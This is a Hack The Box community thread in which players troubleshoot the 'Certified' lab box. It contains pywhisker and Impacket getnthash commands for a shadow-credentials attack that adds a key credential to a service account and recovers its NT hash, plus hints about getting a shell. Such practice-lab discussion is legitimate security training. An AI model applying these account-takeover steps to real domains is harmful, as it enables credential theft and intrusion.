Official Certified Discussion

i cant get thge nt, my pywhisker is geting this error:
./pywhisker.py -d “certified.htb” -u “judith.mader” -p ‘judith09’ --target “management_svc” --action “add”

[] Searching for the target account
[
] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[] Generating certificate
[
] Certificate generated
[] Generating KeyCredential
[
] KeyCredential generated with DeviceID: dade21ea-a6e6-e6b9-022c-05b8277cd7e8
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[!] module ‘OpenSSL.crypto’ has no attribute ‘PKCS12’

I tried certipy and was able to get the ccache. When i merge the ccache and the key taht I found using pywhisker, i got this other error:
…/getnthash.py certified.htb/management_svc -key fbd9abd5fc84d49b86fddabb5d5cc94f4498eee06b4e768ac3fcd2d59c15a2eb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Using TGT from cache
[
] Requesting ticket to self with PAC
[-] ciphertext integrity failure

Did you get a valid pfx? Certipy should not be used in this step

No, pywhisker show this error but add the key. I dont know why. It breaks before show the pfx

I wrote before there is another tool to perform the add task, check the previous comments

1 Like

You need to add judith in the group

after get a key with blodad and gettgtpkinit I receive same error:
…/getnthash.py certified.htb/management_svc -key fbd9abd5fc84d49b86fddabb5d5cc94f4498eee06b4e768ac3fcd2d59c15a2eb

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Using TGT from cache
[
] Requesting ticket to self with PAC
[-] ciphertext integrity failure

Any idea how should i proceed after got the key?

PM me

This worked for me PyOpenSSL has removed deprecated PKCS12 breaking --shadow-credentials in ntlmrelayx.py · Issue #1716 · fortra/impacket · GitHub

pip uninstall pyOpenSSL asgiref
sudo apt-get remove python3-asgiref
pip install asgiref==3.7.2
pip install pyOpenSSL==22.1.0 mitmproxy-rs==0.5.1 urwid-mitmproxy==2.1.1
pip install --upgrade impacket

i got the NT hash,but i can’t remotely control the machine. there’s no winrm-port

the port 5985 is filtered

Thanks to @Yovecio18, I got the shell.

Try switching your VPN to EU Release arena. You will get the shell if your NTLM hash is right.

Learned a lot with this box!! Finally PWNED IT!! Please feel free to DM me if someone needs help… Happy to help :slight_smile:

This still did not work but I am glad that I am not the only one having issues here. I have tried numerous methods I am getting an LdapAttriubuteError when running targetedKerbroast and then a name logger error when running pywhisker

You are not the only one

please can i have help ?

Struggling with the initialfoothold, any hints

You should have the credentials needed for initial enumeration. Incase you missed it, kindly refresh the Hack The Box page. You should see it on the top.

PS: If you are not using it already, kindly use the Release Arena VPN!

1 Like

Sure, DM me please…

No no, the steps mentioned by @Catakan1337 about the pywhisker works. It worked for me. Kindly check the arguments that you used in the command. Also, a hint, you don’t need to use targetedKerberoast here…

1 Like

Managed to have pywhisker working and got a couple of NTLM hashes, now how do I connect?